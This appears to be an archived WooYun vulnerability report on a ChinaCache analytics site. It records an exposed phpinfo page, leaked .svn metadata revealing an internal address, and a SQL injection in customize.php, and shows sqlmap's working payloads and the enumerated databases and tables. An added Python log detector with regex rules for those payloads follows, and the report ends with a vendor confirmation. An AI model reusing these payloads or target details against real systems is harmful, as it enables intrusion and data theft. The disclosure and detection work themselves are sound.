WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-04-28: Details sent to the vendor, awaiting vendor handling
2015-04-28: Vendor confirmed; details disclosed to the vendor only
2015-05-08: Details disclosed to core white hats and domain experts
2015-05-18: Details disclosed to regular white hats
2015-05-28: Details disclosed to intern white hats
2015-06-12: Details disclosed to the public
phpinfo : http://cda.data.chinacache.com/phpinfo.php
The exposed SVN metadata was not very sensitive in itself, but it leaked an internal address, http://220.181.65.245:88/data/cache2/svn/public/cda/ca/ (the .svn/entries fragment that followed it: script 2013-11-27T04:24:45.000000Z 6c0edab4dbbc8ab1b4dcd05cc2b26a09 2013-11-27T05:07:51.954648Z 273 yunpeng.dong has-props ...).
SQL:http://cda.data.chinacache.com/customize.php?id=1
sqlmap output:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (4241=4241) THEN 1 ELSE 0x28 END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GUOX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x49646b6343554d686341,0x7162717171),NULL,NULL-- 
---
web application technology: Nginx, PHP 5.3.19
back-end DBMS: MySQL 5.0.12
current user is DBA: False
available databases [8]:
[*] bugtracker
[*] ca_data
[*] ca_data_test
[*] ca_data_test1
[*] ca_database
[*] information_schema
[*] mysql
[*] test

Database: ca_data
[273 tables]
What are all these tables for? Fortunately...

Database: ca_data_test
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| ca_site_channel       | 40640   |
| region_mobile         | 36850   |
| people_purchase       | 29856   |
| visitor_path_site     | 7418    |
| hot_resource          | 2880    |
| province_isp_flux     | 2558    |
| area_distribution     | 2378    |
| ua_analyse            | 1109    |
| industry_stat         | 818     |
| bandwidth_stat        | 720     |
| exit_page             | 720     |
| exit_rate             | 720     |
| page_load_rate        | 720     |
| region_attribute      | 720     |
| region_fun            | 720     |
| source_path_fun       | 720     |
| visit_page            | 720     |
| dev_oper_base_micr    | 718     |
| region_isp            | 709     |
| portal_page           | 708     |
| regiondistribute      | 686     |
| subvisitsrate         | 329     |
| fun_visitor           | 254     |
+-----------------------+---------+
There were also a few .bak files; I looked through them and found no sensitive information.
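As an added example that is not part of the original report, here is a small detector for the exposures listed above (phpinfo.php, .svn metadata, .bak files, and the three sqlmap injection techniques reported against customize.php?id=) run over nginx access-log lines; the log lines are constructed for the example, not taken from the report.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample nginx access-log lines (not from the report). The request
# targets mirror the report: phpinfo.php, .svn/entries, a .bak probe, and the
# boolean (RLIKE), time-based (SLEEP) and UNION payloads sqlmap reported.
SAMPLE_LOG = """\
10.0.0.1 - - [28/Apr/2015:10:00:01 +0800] "GET /customize.php?id=1 HTTP/1.1" 200 5120
10.0.0.2 - - [28/Apr/2015:10:00:02 +0800] "GET /customize.php?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4241=4241)%20THEN%201%20ELSE%200x28%20END)) HTTP/1.1" 200 5120
10.0.0.2 - - [28/Apr/2015:10:00:09 +0800] "GET /customize.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GUOX) HTTP/1.1" 200 5120
10.0.0.2 - - [28/Apr/2015:10:00:10 +0800] "GET /customize.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x49646b6343554d686341,0x7162717171),NULL,NULL-- HTTP/1.1" 200 6000
10.0.0.3 - - [28/Apr/2015:10:01:00 +0800] "GET /.svn/entries HTTP/1.1" 200 1200
10.0.0.3 - - [28/Apr/2015:10:01:01 +0800] "GET /phpinfo.php HTTP/1.1" 200 65000
10.0.0.3 - - [28/Apr/2015:10:01:02 +0800] "GET /config.php.bak HTTP/1.1" 404 169
"""

# Combined-log-format prefix: client IP, timestamp, method + target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Each rule is applied to the URL-decoded request target.
RULES = [
    ("sqli_boolean_rlike", re.compile(r"\bRLIKE\b\s*\(", re.I)),
    ("sqli_time_sleep",    re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("sqli_union_null",    re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b.*\bNULL\b", re.I)),
    ("svn_metadata_probe", re.compile(r"/\.svn/", re.I)),
    ("phpinfo_exposure",   re.compile(r"/phpinfo\.php(\?|$)", re.I)),
    ("backup_file_probe",  re.compile(r"\.(bak|old|orig|swp)(\?|$)", re.I)),
]

def classify(target: str):
    """Return the names of all rules matching one decoded request target."""
    decoded = unquote_plus(target)
    return [name for name, pat in RULES if pat.search(decoded)]

def scan(log_text: str):
    """Return (client_ip, status, rule_names) for each log line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, status = m.groups()
        names = classify(target)
        if names:
            hits.append((ip, int(status), names))
    return hits

if __name__ == "__main__":
    for ip, status, names in scan(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(names)}")
```

A 200 on /.svn/ or /phpinfo.php is the finding itself; a 404 on a .bak probe still shows someone enumerating, so both are worth alerting on.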
~~~
Severity: High
Vulnerability Rank: 13
Confirmed at: 2015-04-28 16:10
Thank you very much for your report; a fix is in progress.
2015-04-29: The system has been shut down.